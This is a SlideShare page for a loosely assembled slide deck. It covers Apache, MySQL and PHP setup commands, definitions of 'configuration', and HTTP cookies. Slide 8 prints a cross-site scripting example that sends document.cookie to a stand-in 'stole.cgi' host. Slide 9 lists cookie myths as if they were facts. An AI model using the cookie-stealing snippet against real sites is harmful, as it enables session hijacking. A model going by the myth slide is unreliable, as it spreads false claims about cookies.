Con

494 views

Published on

Published in: Design
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
494
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Con

  1. 1. Install Apache Apache: gunzip apache_1.3.23.tar.gz | tar xvf -      cd apache_1.3.23      ./configure --with-layout=RedHat --enable-module=so      make      make install
  2. 2. Install MySQL MySQL: rpm -Uvh MySQL-devel-3.23.49-1_i386.rpm      rpm -Uvh MySQL-3.23.49-1_i386.rpm      rpm -Uvh MySQL-client-3.23.49-1_i386.rpm
  3. 3. Install PHP PHP: gunzip php-4.1.1.tar.gz | tar xvf -      cd php-4.1.1      ./configure --with-apxs=/usr/sbin/apxs --with-mysql      make      make install
  4. 4. Configuration Computer configuration or system configuration Configure (computing) is the output of Autotools and used to detect system configuration. This is referred to as "./configure" in Unix Configuration file is a software file used to configure the initial settings for a computer program
  5. 5. Other usages include Electron configuration Configuration (geometry) Configuration space Molecular configuration Configuration management is a management discipline Configuration (locomotive parts)
  6. 6. In Historical Behaviour Studies , configuration is a pattern of historical behaviour
  7. 7. cookie Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request . For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that looks like the following one: GET /index.html HTTP/1.1 Host: www.example.org
  8. 8. EXAMPLE: <a href=&quot;#&quot; onclick=&quot;window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;&quot;>Click here!</a>
  9. 9. Cookies are like viruses in that they can infect the user's hard disks Cookies generate pop-ups Cookies are used for spamming Cookies are used only for advertising
  10. 10. Browser settings To enable or disable cookies completely, so that they are always accepted or always blocked. To allow the user to see the cookies that are active with respect to a given page by typing javascript:alert(document.cookie) in the browser URL field. Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.

×